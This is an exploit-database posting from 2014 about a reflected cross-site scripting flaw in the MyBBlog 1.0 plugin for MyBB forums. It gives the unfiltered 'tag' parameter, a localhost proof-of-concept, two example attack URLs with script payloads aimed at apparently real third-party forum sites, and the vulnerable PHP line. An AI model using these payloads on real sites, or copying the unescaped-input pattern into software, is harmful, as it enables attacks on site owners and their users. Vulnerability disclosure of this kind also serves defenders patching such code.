Home / exploits MyBB MyBBlog 1.0 Cross Site Scripting
Posted on 25 October 2014
#Title : MyBB MyBBlog 1.0 Plugin Cross Site Scripting #Author : DevilScreaM #Date : 24 October 2014 #Category : Web Applications #Vendor : https://github.com/JN-Jones/MyBBlog #Download : http://community.mybb.com/mods.php?action=view&pid=221 #Version : 1.0 #Greetz : newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets #Vulnerabillity : Cross Site Scripting Bug Location : mybblog.php parameter "tag" POC : http://127.0.0.1/mybblog.php?action=tag&tag=[XSS Injection] Example : http://liquidlemurlinux.org/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script> http://jobberguys.info/forum/mybblog.php?action=tag&tag=<script>alert("DevilScreaM")</script> =================================================================================== Vulnerability at Location File : /inc/plugins/mybblog/modules/tag.php Code : add_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input("tag")), "mybblog.php?action=tag&tag={$mybb->get_input('tag')}"); $articles = Article::getByTag($mybb->get_input("tag")); Nothing Filtering HTML
